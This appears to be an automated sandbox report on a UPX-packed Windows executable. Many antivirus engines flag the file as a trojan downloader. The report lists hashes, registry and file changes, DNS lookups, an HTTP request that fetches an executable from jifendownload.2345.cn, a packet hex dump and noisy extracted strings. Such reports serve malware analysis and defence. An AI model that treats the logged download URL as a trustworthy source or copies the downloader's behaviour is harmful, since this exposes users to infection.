Analysis Date2015-02-03 23:46:43
MD5b66e733e0b632ab1c0e137a2def310ca
SHA15bf12f0169241c5c7b8a8c877701fbdae3776dbc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 62869d241869112fcfd866441aae4ed4 sha1: 9b833e221e4e9e7f59fa5df3c731f2f8462310d9 size: 26112
SectionUPX2 md5: 374609d24c9729da8b0abbebd327118a sha1: a3de85f37000deac6254ede3b2ed9d8224180807 size: 512
Timestamp2014-06-01 05:12:10
PackerUPX -> www.upx.sourceforge.net
PEhash9b8cbf1ceee05ae4c4a6cc9692a1c3521ecd45c6
IMPhashaae523b64817f87cd3e70389d57336b0
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.PT.bmGfbmH2SJc
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Gen:Trojan.Heur.PT.bmGfbmH2SJc
AVAuthentiumW32/Downloader-Web-based!Maximu
AVAvira (antivir)no_virus
AVBullGuardGen:Trojan.Heur.PT.bmGfbmH2SJc
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.DownLoader11.18931
AVEmsisoftGen:Trojan.Heur.PT.bmGfbmH2SJc
AVEset (nod32)Win32/TrojanDownloader.Agent.AHB
AVFortinetW32/Agent.AC!tr
AVFrisk (f-prot)W32/Downloader-Web-based!Maximu
AVF-SecureGen:Trojan.Heur.PT.bmGfbmH2SJc
AVGrisoft (avg)Downloader.Generic13.CFIZ
AVIkarusBackdoor.Win32.Androm
AVK7Trojan ( 0040f8b51 )
AVKasperskyno_virus
AVMalwareBytesno_virus
AVMcafeeRDN/Generic Downloader.x!mn
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Trojan.Heur.PT.bmGfbmH2SJc
AVRisingno_virus
AVSophosMal/DownLdr-AC
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates Filec:\2345pack.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates MutexA9DB83DB_A9FD_11D0_BFD1_444553540000
Winsock DNSjifendownload.2345.cn
Winsock URLhttp://jifendownload.2345.cn/jifen_2345/p3_k70942462_jgAdzMQZ8XSp4yAskGpQJ_v14.6.1.exe

Network Details:

DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSjifendownload.2345.cn
Type: A
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_k70942462_jgAdzMQZ8XSp4yAskGpQJ_v14.6.1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 61.160.245.14:80

Raw Pcap
0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 37303934 32343632 5f6a6741   p3_k70942462_jgA
0x00000020 (00032)   647a4d51 5a385853 70347941 736b4770   dzMQZ8XSp4yAskGp
0x00000030 (00048)   514a5f76 31342e36 2e312e65 78652048   QJ_v14.6.1.exe H
0x00000040 (00064)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000050 (00080)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000060 (00096)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000070 (00112)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000080 (00128)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000090 (00144)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x000000a0 (00160)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x000000b0 (00176)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000c0 (00192)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000d0 (00208)   6f73743a 206a6966 656e646f 776e6c6f   ost: jifendownlo
0x000000e0 (00224)   61642e32 3334352e 636e0d0a 436f6e6e   ad.2345.cn..Conn
0x000000f0 (00240)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x00000100 (00256)   76650d0a 0d0a                         ve....


Strings
 
Y7
E 
Y7
E
.2345.cn
=24A|YPVu\_'
,&2FXj
	3P34[
4_kX3[
4MTLD<4,4M
4MxdyTzD6M
553540O
6/09O5
62_jgAdzMQZ8XSp4yAskGpQJ_v14.6.1
7invali
8,9:t5
.+8argu(sr
8Y_Q=)#c
A9DB83
~A:kY Y
AQHF.s
.awXs8
_ba!"@-
@bm;wY
boy/	3f
cCOEMCP	A
:CMZUH<
DbjN[`.
D"Bz @
d#g_Locp
+dHandKhReU
dSUVWh(
eda	8RjAt
e'	on*
essageBoxA
excep5
ExitProcess
Exp.d.
F0 '&2
F"10GI
fbit set
FD_11D0_B
GetProcAddress
__GLOBAL_HEAP_SELECTED
H`-b-n=
%\\?hc
heap7'
-HX_^T
;+IEFav
"ios::eo7
IsWindow
?I"U4;
KERNEL32.DLL
LoadLibraryA
-m8FqB
M!_ll(_4_
~ModulHNamLExi2
Movie1
n~Configath
ng too lo
o"64a)\
;OCF?t
/p3_k709424
"`)pdB
p@gram JmR
PQ^V#j
-][q(E
r8OPNHO
Rich]/
< s.#$
Safeic_aoZi
Sd@6f,4 
SHELL32.dll
ShellExecuteA
sO;>|C;{
SoHuGKuWo
sSHKVs
StartAuto
<std5pur+
striNv
SuQ"],
SVCRT7run
{. SVTyp
TADVAPI32.dll"
!This program cannot be run in DOS mode.
tk'_t@
tlUn@7
ToWi>C0A
tp://jifeon
:<[Tuf9x
tvBgoN<v)
<u@:)p
URLDownloadToFileA
urlmon.dll
USER32.dll
UUnknown 
v1HCIm
v	2bax
~)v&7^Ob
v#8le=[
v95c}R
VC20XC00
`!Vers6J=
virtu!3
VirtualProtect
v- Kable
``w[!HLW
,wLV]SJ
 /<WlY3
WQR	a|
w+!v'+
xo<EkE)S-]
XPTPSW
}xw!_L
Zm god